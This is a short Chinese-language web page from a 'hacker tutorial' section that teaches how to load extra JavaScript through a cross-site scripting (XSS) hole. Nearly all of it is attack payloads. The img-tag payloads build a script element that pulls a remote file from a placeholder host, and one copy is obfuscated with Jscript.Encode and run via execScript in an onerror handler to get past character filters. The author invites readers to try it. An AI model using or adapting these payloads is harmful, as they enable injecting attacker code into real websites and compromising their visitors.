手机
当前位置:查字典教程网 >网络安全 >黑客教程 >教你如何在XSS中再插JS
教你如何在XSS中再插JS
摘要:字符过滤怎么办?用Encode加密后就无敌了~未加密前:加密后:嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一...

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img> 字符过滤怎么办?用Encode加密后就无敌了~ 未加密前:

<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 加密后:

<img src='#' XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es UYcm.nmY As s xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs OR(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一次Encode加密后的代码

【教你如何在XSS中再插JS】相关文章:

教你如何通过Mysql弱口令得到系统权限

十一个步骤让你了解黑客是如何一步步攻击我们的 防御措施

教你如何用ISAPI_Rewrite做IIS防盗链

如何多开QQ游戏大厅

教你学会Cookie与联合查询的注入

必须了解的黑客入侵网站的十条原因及相应抵御方法

针对Oracle的TNS listener的攻击方法

教你在QQ空间挂马

教你如何手工注入猜解语句

教你如何在肉鸡的Serv-u中建立安全且隐藏的帐号

精品推荐
分类导航